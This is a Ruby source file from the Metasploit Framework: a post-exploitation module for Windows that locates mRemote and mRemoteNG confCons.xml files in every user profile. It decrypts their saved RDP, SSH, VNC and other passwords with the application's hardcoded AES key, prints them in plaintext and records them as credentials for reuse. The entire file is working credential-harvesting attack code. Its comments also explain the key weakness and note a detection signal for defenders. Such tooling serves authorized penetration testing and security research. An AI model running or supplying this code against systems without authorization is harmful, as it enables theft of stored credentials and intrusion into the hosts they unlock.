rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/mremote.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
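class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Auxiliary::Report

  # Fixed AES-128 key under which mRemote stores connection passwords
  # (used with 'AES-128-CBC' in #decrypt_password). Because the key is a
  # constant baked into the application rather than something derived per
  # user or protected by the operating system's credential store, anyone who
  # can read confCons.xml can recover every saved password. That is the
  # design weakness this module demonstrates.
  MREMOTE_KEY = "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c".b.freeze

  # Per-user connection files, relative to the profile's LocalAppData
  # (mRemote) and AppData (mRemoteNG) directories. For defenders: reads of
  # these files by any process other than mRemote/mRemoteNG itself are a
  # reasonable detection signal.
  MREMOTE_CONF = '\\Felix_Deimel\\mRemote\\confCons.xml'.freeze
  MREMOTENG_CONF = '\\mRemoteNG\\confCons.xml'.freeze

  # Module metadata consumed by the framework.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather mRemote Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from mRemote. mRemote stores
          connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves
          the passwords in an encrypted format. The module will extract the connection
          info and decrypt the saved passwords.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'theLightCosine',
          'hdm', # Helped write the Decryption Routine
          'mubix' # Helped write the Decryption Routine
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Walk every local user profile and process both connection files.
  #
  # @return [void]
  def run
    grab_user_profiles.each do |user|
      local_app_data = user['LocalAppData']
      app_data = user['AppData']

      # Either base directory may be nil for a given profile; guard each one
      # separately so a missing AppData does not raise NoMethodError and
      # abort the whole run.
      get_xml(local_app_data + MREMOTE_CONF) unless local_app_data.nil?
      get_xml(app_data + MREMOTENG_CONF) unless app_data.nil?
    end
  end

  # Read one confCons.xml from the target, save it as loot and parse it.
  #
  # @param path [String] full path of the file on the target
  # @return [void]
  def get_xml(path)
    print_status("Looking for #{path}")
    return unless file_exist?(path)

    condata = read_file(path)
    loot_path = store_loot('mremote.creds', 'text/xml', session, condata, path)
    vprint_good("confCons.xml saved to #{loot_path}")
    parse_xml(condata)
    print_status("Finished processing #{path}")
  rescue Rex::Post::Meterpreter::RequestError
    print_status("The file #{path} either could not be read or does not exist")
  rescue REXML::ParseException => e
    # Malformed XML; the raw file has already been stored as loot above, so
    # only the parsing step is lost.
    print_error("Failed to parse #{path}: #{e.message}")
  end

  # Extract every <Node> element carrying a saved password, decrypt it and
  # record the result as a credential/login pair.
  #
  # @param data [String] contents of confCons.xml
  # @return [void]
  # @raise [REXML::ParseException] when the data is not well-formed XML
  def parse_xml(data)
    root = REXML::Document.new(data).root
    if root.nil?
      print_error('confCons.xml has no root element; nothing to parse')
      return
    end

    root.elements.to_a('//Node').each { |node| process_node(node) }
  end

  # Decrypt a single ciphertext with OpenSSL.
  #
  # @param encrypted_data [String] raw ciphertext (no IV prefix)
  # @param key [String] raw key bytes of the length the cipher expects
  # @param iv [String, nil] raw IV; not set when nil
  # @param cipher_type [String] OpenSSL cipher name, e.g. 'AES-128-CBC'
  # @return [String] plaintext
  # @raise [OpenSSL::Cipher::CipherError] on a padding failure, which is what
  #   a wrong key or corrupted ciphertext looks like to CBC decryption
  def decrypt(encrypted_data, key, iv, cipher_type)
    aes = OpenSSL::Cipher.new(cipher_type)
    aes.decrypt
    aes.key = key
    aes.iv = iv unless iv.nil?
    aes.update(encrypted_data) + aes.final
  end

  private

  # Handle one <Node>: decrypt its Password attribute and report the
  # credential. A node whose value cannot be decoded or decrypted is reported
  # and skipped so that the remaining nodes are still processed.
  #
  # @param node [REXML::Element]
  # @return [void]
  def process_node(node)
    host = node.attributes['Hostname']
    port = node.attributes['Port']
    proto = node.attributes['Protocol']
    user = node.attributes['Username']
    domain = node.attributes['Domain']
    epassword = node.attributes['Password']
    return if epassword.nil? || epassword.empty?

    pass = decrypt_password(epassword)
    if pass.nil?
      # The value is not in the layout this module understands (Base64 of a
      # 16-byte IV followed by AES-128-CBC ciphertext under MREMOTE_KEY).
      print_error("HOST: #{host} USER: #{user}: saved password could not be decrypted, skipping")
      return
    end

    print_good("HOST: #{host} PORT: #{port} PROTOCOL: #{proto} Domain: #{domain} USER: #{user} PASS: #{pass}")
    report_login(host, port, proto, user, domain, pass)
  end

  # Base64-decode the Password attribute, split off the leading 16-byte IV
  # and decrypt the remainder with the fixed key.
  #
  # @param epassword [String] Base64 text from the Password attribute
  # @return [String, nil] plaintext, or nil when the decoded value is too
  #   short to hold an IV plus ciphertext or does not decrypt cleanly
  def decrypt_password(epassword)
    decoded = epassword.unpack('m*').first
    # Exactly 16 bytes would leave an empty ciphertext, which
    # OpenSSL::Cipher#update rejects with ArgumentError.
    return nil if decoded.bytesize <= 16

    iv = decoded.slice!(0, 16)
    decrypt(decoded, MREMOTE_KEY, iv, 'AES-128-CBC')
  rescue OpenSSL::Cipher::CipherError
    nil
  end

  # Store the recovered credential in the database and link it to the
  # service it belongs to.
  #
  # @param host [String, nil] target address
  # @param port [String, nil] port as it appears in the XML
  # @param proto [String, nil] protocol name, used as the service name
  # @param user [String, nil]
  # @param domain [String, nil] non-empty marks a domain account
  # @param pass [String] recovered plaintext password
  # @return [void]
  def report_login(host, port, proto, user, domain, pass)
    service_data = {
      address: host,
      port: port,
      service_name: proto,
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :password,
      private_data: pass,
      username: user
    }.merge(service_data)

    if domain.present?
      credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
      credential_data[:realm_value] = domain
    end

    # Create the Metasploit::Credential::Core object, then the Login that
    # ties it to the service.
    credential_core = create_credential(credential_data)
    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)
    create_credential_login(login_data)
  end
end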